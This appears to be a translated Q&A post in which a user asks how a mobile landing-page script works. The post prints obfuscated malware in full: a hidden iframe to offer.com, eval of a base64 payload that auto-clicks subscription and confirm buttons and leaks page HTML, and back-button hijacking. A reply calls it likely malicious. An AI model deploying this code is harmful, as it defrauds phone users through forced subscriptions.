我正在为移动网站使用登陆器,但我不太确定iframe如何处理这个特定的脚本。
<html><head>
<base href="">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>title</title>
<meta content="IE-edge,chrome=1" http-equiv="X-UA-Compatible">
<meta content="user-scalable=no, width=device-width, initial-scale=1.0, maximum-scale=1.0" name="viewport">
<link rel="stylesheet" href="reset.css">
<link rel="stylesheet" href="style.css">
<script>
var jmurl = 'https://google.com';
</script>
</head>
<body>
<style type="text/css">
.footer {
box-sizing: border-box;
}
.f-links {
text-align: center;
}
.f-links a {
display: inline-block;
margin: 10px 4px;
font-size: 11px;
font-weight: bold;
text-decoration: none;
}
</style>
<script type="text/javascript">
function playbut() {
document.getElementsByClassName("ldr")[0].style.display = 'block';
document.getElementsByClassName("circle")[0].style.display = 'none';
}
setTimeout(function () {
document.getElementById("preview").style.display = 'block';
document.getElementsByClassName("ldr")[0].style.display = 'none';
document.getElementsByClassName("ldr")[1].style.display = 'none';
document.getElementsByClassName("circle")[0].style.display = 'block';
}, 14000);
</script>
<div class="player-bloc">
<div class="player" id="player">
<div class="preview" id="preview" style="background-image: url(aa.gif); background-size: 100%; display: block; background-position: 50% 50%; background-repeat: no-repeat no-repeat;"></div>
<div style="display: block;" class="pop" id="spinner">
<div class="circle" onclick="playbut()" style="display: block;">
<div class="circle_inner"></div>
</div>
<div class="loader ldr" style="display: none;">Loading...</div>
<div class="btn-zone ldr" style="display: none;">
<h2>Loading video</h2>
</div>
</div>
</div>
<div class="controls">
<div class="ctrl">
<img src="play.png" alt="">
</div>
<div class="ctrl">
<img src="stop.png" alt="">
</div>
<div class="ctrl big">
<div class="bar">
<div class="bar-time"></div>
</div>
</div>
<div class="ctrl">
<img src="volume.png" alt="">
</div>
<div class="ctrl">
<img src="expand.png" alt="">
</div>
<div class="ctrl">
<img src="fullscreen.png" alt="">
</div>
</div>
</div>
<div class="texte">
<p>text</p>
</div>
<script type="text/javascript" src="backfix.min.js"></script>
<script>
function cxc(x) {
var navU = navigator["userAgent"];
var isAndroidMobile = navU["indexOf"]("Android") > -1 && navU["indexOf"]("Mozilla/5.0") > -1 && navU["indexOf"]("AppleWebKit") > -1;
var pattern=/Chrome\/([\d\.]+)/;
var regExChrome = new RegExp(pattern);
var resultChromeRegEx = regExChrome["exec"](navU);
var chromeVersion = (resultChromeRegEx === null ? null : regExChrome["exec"](navU)[1]);
var cv=chromeVersion===null?null:chromeVersion.substr(3).replace(/\./g,'');
var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMC5EQiBDQUxMLUlOSVRJQUw+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwp3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCcxLkRCIENBTEwtSFRNTCgwKT4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwoKaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Yl9idG4nKSE9dW5kZWZpbmVkKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBzdWJfYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdWJfYnRuJykuY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2J0biBjbGNpa2VkJywgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpLmxlbmd0aD09MSkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xjaWtlZCcsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpLmxlbmd0aD4wKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdzdWJtaXR0ZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0biBidG4tc3VjY2VzcyBidG4tbGcnKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZz4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZycpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gYnRuLXN1Y2Nlc3MgYnRuLWxnIGNsaWNrZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2NvbmZpcm1idXR0b24nKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnRk9VTkQgY2xpY2sxPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdjb25maXJtYnV0dG9uJylbMF0uY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2NsaWNrZWQyPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7Cn0KZWxzZQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2Vsc2U+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQ==";
if (isAndroidMobile && cv!=='0') {
IDBKeyRange.only.call(frames[x],0).constructor.constructor('eval(atob(\"'+ value +'\"))')();
}else{
window.open("\u0000javascript:eval(atob(\""+ value +"\"))", "androidload"+x);
}
}
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function(){cxc(0)};
i.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');
i.setAttribute('sandbox', 'allow-scripts allow-forms allow-same-origin allow-popups');
i.src = "javascript:window.location.replace('http://offer.com')";
setTimeout(function(){location.replace(jmurl);}, 200000);
</script>
<script>
!function () {
var t;
try {
for (t = 0; 10 > t; ++t)history.pushState({}, "", '#');
onpopstate = function (t) {
t.state && location.replace('#')
}
}
catch (o) {
}
}();
</script>
</body><iframe style="position:absolute;left:-9999px;top:-9999px;height:1px;width:1px" sandbox="allow-scripts allow-forms allow-same-origin allow-popups" src="javascript:window.location.replace('http://offer.com')"></iframe></html>
现在,我在理解第86行中的脚本如何工作时遇到问题,(是以函数函数cxc(x){开头的那个,因为它似乎是生成iframe为“offer.com”网址。
我认为 i.setAttribute 显示的值可能会在执行时生成,我只是复制了为该特定执行生成的值(因为位置和大小似乎是奇数)< / p>
如果你能指出我正确的方向,请告诉我,我想了解这是如何运作的。
编辑:
var value =“d2luZG93LnBhcmVudC ...的部分已加密,使用base64我得到以下代码:
window.parent.postMessage('0.DB CALL-INITIAL>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('1.DB CALL-HTML(0)>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
if(document.getElementById('sub_btn')!=undefined)
{
window.parent.postMessage('found sub_btn>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
document.getElementById('sub_btn').click();
window.parent.postMessage('btn clciked', '*');
}
else if(document.getElementsByClassName('btn').length==1)
{
window.parent.postMessage('found btn>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
document.getElementsByClassName('btn')[0].click();
window.parent.postMessage('btn clciked', '*');
}
else if(document.getElementsByClassName('btnAcept').length>0)
{
window.parent.postMessage('found btnAcept>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('found btnAcept>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
document.getElementsByClassName('btnAcept')[0].click();
window.parent.postMessage('submitted>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(document.getElementsByClassName('btn btn-success btn-lg').length>0)
{
window.parent.postMessage('found btn btn-success btn-lg>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
document.getElementsByClassName('btn btn-success btn-lg')[0].click();
window.parent.postMessage('btn btn-success btn-lg clicked>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else if(document.getElementsByClassName('confirmbutton').length>0)
{
window.parent.postMessage('FOUND click1>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
document.getElementsByClassName('confirmbutton')[0].click();
window.parent.postMessage('clicked2>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
else
{
window.parent.postMessage('else>>>href:[' + window.location.href + ']; ref:[' + document.referrer + '];', '*');
window.parent.postMessage('else>>>'+ document.getElementsByTagName('html')[0].innerHTML, '*');
}
答案 0 :(得分:0)
这一行是一个加密数据,在下一个eval中解密(atob ..部分。很可能是恶意的,试图将自己注入页面。
var value= "d2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnMC5EQiBDQUxMLUlOSVRJQUw+Pj5ocmVmOlsnICsgd2luZG93LmxvY2F0aW9uLmhyZWYgKyAnXTsgcmVmOlsnICsgZG9jdW1lbnQucmVmZXJyZXIgKyAnXTsnLCAnKicpOwp3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCcxLkRCIENBTEwtSFRNTCgwKT4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwoKaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ3N1Yl9idG4nKSE9dW5kZWZpbmVkKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBzdWJfYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdzdWJfYnRuJykuY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2J0biBjbGNpa2VkJywgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpLmxlbmd0aD09MSkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0bicpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gY2xjaWtlZCcsICcqJyk7Cn0KZWxzZSBpZihkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpLmxlbmd0aD4wKQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+PmhyZWY6WycgKyB3aW5kb3cubG9jYXRpb24uaHJlZiArICddOyByZWY6WycgKyBkb2N1bWVudC5yZWZlcnJlciArICddOycsICcqJyk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdmb3VuZCBidG5BY2VwdD4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdidG5BY2VwdCcpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdzdWJtaXR0ZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2J0biBidG4tc3VjY2VzcyBidG4tbGcnKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnZm91bmQgYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZz4+PicrIGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdodG1sJylbMF0uaW5uZXJIVE1MLCAnKicpOwogICAgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeUNsYXNzTmFtZSgnYnRuIGJ0bi1zdWNjZXNzIGJ0bi1sZycpWzBdLmNsaWNrKCk7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdidG4gYnRuLXN1Y2Nlc3MgYnRuLWxnIGNsaWNrZWQ+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQplbHNlIGlmKGRvY3VtZW50LmdldEVsZW1lbnRzQnlDbGFzc05hbWUoJ2NvbmZpcm1idXR0b24nKS5sZW5ndGg+MCkKewogICAgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSgnRk9VTkQgY2xpY2sxPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7CiAgICBkb2N1bWVudC5nZXRFbGVtZW50c0J5Q2xhc3NOYW1lKCdjb25maXJtYnV0dG9uJylbMF0uY2xpY2soKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2NsaWNrZWQyPj4+JysgZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2h0bWwnKVswXS5pbm5lckhUTUwsICcqJyk7Cn0KZWxzZQp7CiAgICB3aW5kb3cucGFyZW50LnBvc3RNZXNzYWdlKCdlbHNlPj4+aHJlZjpbJyArIHdpbmRvdy5sb2NhdGlvbi5ocmVmICsgJ107IHJlZjpbJyArIGRvY3VtZW50LnJlZmVycmVyICsgJ107JywgJyonKTsKICAgIHdpbmRvdy5wYXJlbnQucG9zdE1lc3NhZ2UoJ2Vsc2U+Pj4nKyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaHRtbCcpWzBdLmlubmVySFRNTCwgJyonKTsKfQ==";